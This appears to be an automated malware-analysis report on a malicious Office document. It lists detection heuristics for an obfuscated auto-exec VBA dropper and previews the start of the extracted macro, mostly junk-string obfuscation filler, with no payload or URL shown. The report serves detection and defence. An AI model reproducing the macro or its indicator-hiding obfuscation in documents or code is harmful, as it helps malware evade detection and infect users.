MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing a large, obfuscated VBA macro. Critical heuristics indicate the presence of an auto-exec loader that uses `Shell()` and `CreateObject` calls, typical for executing malicious code. The macro's obfuscation and auto-execution suggest it is designed to download and run a secondary payload, hence the 'Malicious File' technique. No specific family could be identified due to the heavy obfuscation.
Heuristics 8
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 191259 bytes |
SHA-256: 5bcdc68886240376aa32793e2888fe8d915143300b9dbbe33412bf65eeecacf2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lQBhI(QgZsRoh As String) As String
For arMdvS = 0 To 6
TOMcuAx = Left("SX!HhA^oeki&(rS)M)U", 3)
MjlOffub = UCase("DMJ@cDqj*k#")
WxzIfMAMRI = Space(15)
Next arMdvS
For rEaJDI = 0 To 7
SrDSbfWX = Space(4)
MjlOffub = LTrim("neyf.NfZfEjO(aR@[")
Gearou = RTrim("?PnisMkFMEqdn")
MjlOffub = "oCugn@aGcvdMTHX#T" + "g]l%fu%SP^(Gq^yG" + "^x_mwKb_tESX*PyKQ"
TOMcuAx = 1580 + 653 + 619
Next rEaJDI
For yRIafu = 0 To 4
For OzTfop = 0 To 10
YKauGnZSZBql = Space(7)
WcvlXCfZ = Left("dr(Yxz-o-H.s%!NcOpE", 4)
Pymuh = UCase("nG)f]hgnGRG#nQ")
Next OzTfop
HeaPC = 668 + 182 + 534
JWbkwLTLNw = Space(17)
bjoqji = "F$Iv.l_C^kBzTAk@PpE" + "Ua[*%MLsc]y" + "r*Ym$^m)]T"
RBUcdYv = LTrim("RIGJ znIxLyjbc")
Next yRIafu
JoieuruIjmNt = StrReverse("r$Anqc]jC&Kj")
For HvApSk = 0 To 4
While XBQWIU < 4
TOMcuAx = Left("YX_XV#i!&eRmzXrCS (R", 5)
QBtge = Space(17)
XBQWIU = XBQWIU + 3
Wend
RBUcdYv = Right("f ]xd#Z-Mxzd^N&", 3)
RBUcdYv = StrReverse("c$s nL?$Sev!]Ebl%gU")
QBtge = 1982 + 960 + 629
WcvlXCfZ = UCase("!jXt]trvrk_iNOE")
TOMcuAx = Right("!GYMJbBELk", 2)
SrDSbfWX = Left("a!Hv[ZYG!.Lg", 3)
JWbkwLTLNw = 1442 + 1289 + 1998
RBUcdYv = Space(2)
Gearou = UCase("s$YrmofrBG")
Next HvApSk
WcvlXCfZ = StrReverse("uQC@NgZf-k")
JWbkwLTLNw = RTrim("Vm.#ucVr.!)Gs")
HeaPC = Left("tBWjgQ$PfTrOpxk", 5)
MjlOffub = UCase("IZml[$q#UT!rG-t?c")
While wYuSun < 4
While XTMhbN < 1
HeaPC = 1537 - 918 - 1749
JWbkwLTLNw = LTrim("n$FKJbnxKV#rhosbZ$T.")
bjoqji = StrReverse("NqVNWYDYd$KWcNT")
JoieuruIjmNt = StrReverse("fpigVkf#@yL#B-PcH[$C")
RBUcdYv = StrReverse("*bt.E?bxH^U")
XTMhbN = XTMhbN + 1
Wend
bvOGov = UCase("IaChAiAFsAxi#eC*#W")
YKauGnZSZBql = Right("O A^kWGq# W[ceq", 2)
bvOGov = RTrim("U[)($B*.b$N(Q")
HeaPC = 1454 + 1902 + 1128
RBUcdYv = StrReverse("LsZ %tkRw[xt@%")
SrDSbfWX = RTrim("b(EKQRP#Id!BEHdw")
TOMcuAx = LTrim("euOpEB]IZIXJiKU")
SrDSbfWX = RTrim("[[P%H[LL[^%vpzPX#%")
wYuSun = wYuSun + 1
Wend
Dim nrvWEWfW() As Byte
While gfdJzZ < 4
JoieuruIjmNt = Left("@TjapS)Xxu d!iHf", 3)
JoieuruIjmNt = RTrim("w^Zh^oM rB")
SrDSbfWX = "mBYnLsPryRyiDDaa#MUL" + "em%E gV]UbY-#JNycbO" + "]_]xC]z]FU"
JoieuruIjmNt = 328 - 281 - 1191
TOMcuAx = Right("tjD$zxwW#h]t[#E$(v", 2)
bjoqji = UCase("!lEve@V hg")
HeaPC = Space(5)
gfdJzZ = gfdJzZ + 1
Wend
While orJPMk < 4
While YvfCbp < 1
SrDSbfWX = 433 - 476 - 919
TOMcuAx = UCase("xGit#HopzFbG&mwJe!r")
YvfCbp = YvfCbp + 1
Wend
Gearou = 1127 + 1421 + 1612
JWbkwLTLNw = Space(14)
RBUcdYv = UCase("rsKqvPecHhSnb")
RBUcdYv = "LucwKFvFYpYNSxeV" + "w_uR#K-!MPzA^K" + "gNt.lm!rmPW]N)s[ZmHw"
RBUcdYv = Left("O]mq&radrvKe$", 2)
bjoqji = UCase("#xlypymHrGoq^zRbjyx")
bvOGov = Right("w_EhIDK[kZQ@frP", 4)
Pymuh = 820 + 186 + 344
RBUcdYv = 1210 + 435 + 935
orJPMk = orJPMk + 2
Wend
For PLxNaU = 0 To 9
RBUcdYv = "i*MN)goNES-u[W" + "zCEDR%hyiJGz" + "bdDksX @_sGrNrf"
YKauGnZSZBql = 1349 + 108 + 1545
WcvlXCfZ = UCase("#cleFArL_cGfLairTn")
JoieuruIjmNt = 879 - 1197 - 1285
Next PLxNaU
For RlkGhY = 0 To 4
For pfKldA = 0 To 7
SrDSbfWX = 1255 - 946 - 1792
Gearou = RTrim("RndNUZHdHcsPRa&")
JoieuruIjmNt = "-(]eTtcyHk]yb" + "d@SjLEGGPbbGEU" + "Jphcl%@xY@blPis#SL?$"
QBtge = 498 - 1947 - 1928
WxzIfMAMRI = 1686 + 1389 + 480
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.